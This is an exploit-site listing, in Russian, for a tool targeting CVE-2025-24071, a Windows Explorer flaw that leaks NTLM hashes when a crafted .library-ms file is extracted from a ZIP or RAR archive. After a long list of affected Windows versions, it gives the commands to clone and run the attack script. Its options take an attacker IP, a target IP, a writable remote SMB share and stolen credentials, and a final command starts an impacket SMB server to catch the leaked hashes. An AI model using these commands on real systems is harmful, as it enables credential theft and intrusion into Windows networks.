Sploitus

Exploit for CVE-2025-24071

kitploit · 2026-09-04

Exploit Code

MARKDOWN59 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-F4DEE-BACKUP-CVE-2025-24071
# CVE-2025-24071

Уязвимость подмены проводника Windows - CVE-2025-24071

Утечка NTLM-хэша Windows путем извлечения специально подготовленного ZIP- или RAR-файла и эксплуатации уязвимости при обработке файлов .library-ms (типа файлов, используемых Windows для указания библиотек и сетевых подключений).

## Затронутые версии

Windows 10 версии 1809 для 64-разрядных систем Windows 10 версии 1809 для 32-разрядных систем Windows Server 2025 (установка Server Core) Windows Server 2025 Windows Server 2012 R2 (установка Server Core) Windows Server 2012 R2 Windows Server 2016 (установка Server Core) Windows Server 2016 Windows 10 версии 1607 для 64-разрядных систем Windows 10 версии 1607 для 32-разрядных систем Windows 10 для 64-разрядных систем Windows 10 для 32-разрядных систем Windows 11 версии 24H2 для 64-разрядных систем Windows 11 версии 24H2 для систем на базе ARM64 Windows Server 2022, редакция 23H2 (установка Server Core) Windows 11 версии 23H2 для 64-разрядных систем Windows 11 версии 23H2 для систем на базе ARM64 Windows 10 версии 22H2 для 32-разрядных систем Windows 10 версии 22H2 для систем на базе ARM64 Windows 10 версии 22H2 для 64-разрядных систем Windows 11 версии 22H2 для 64-разрядных систем Windows 11 версии 22H2 для систем на базе ARM64 Windows 10 версии 21H2 для 64-разрядных систем Windows 10 версии 21H2 для систем на базе ARM64 Windows 10 версии 21H2 для 32-разрядных систем Windows Server 2022 (установка Server Core) Windows Server 2022 Windows Server 2019 (установка Server Core) Windows Server 2019

## Установка:

root@kitploit:~
    
    
    git clone https://github.com/f4dee-backup/CVE-2025-24071
    

root@kitploit:~
    
    
    cd CVE-2025-24071
    

root@kitploit:~
    
    
    chmod +x CVE-2025-24071.sh
    

## Панель справки:

root@kitploit:~
    
    
    ./CVE-2025-24071.sh -h
    	-i) Ваш IP-адрес
    	-t) IP-адрес цели
    	-d) Удаленная SMB-шара с правами на запись (например, C, ADMIN, IPC, SYSVOL и т.д.)
    	-u) Имя пользователя
    	-p) Пароль
    	-h) Отобразить эту панель справки
    

## Использование:

root@kitploit:~
    
    
    ./CVE-2025-24071.sh -i "ВАШ_IP" -t "IP_ЦЕЛИ" -d "УДАЛЕННЫЙ_КАТАЛОГ_ЗАПИСЬ" -u "ПОЛЬЗОВАТЕЛЬ" -p "ПАРОЛЬ"
    

## Запуск SMB-сервера:

root@kitploit:~
    
    
    impacket-smbserver smbFolder $(pwd) -smb2support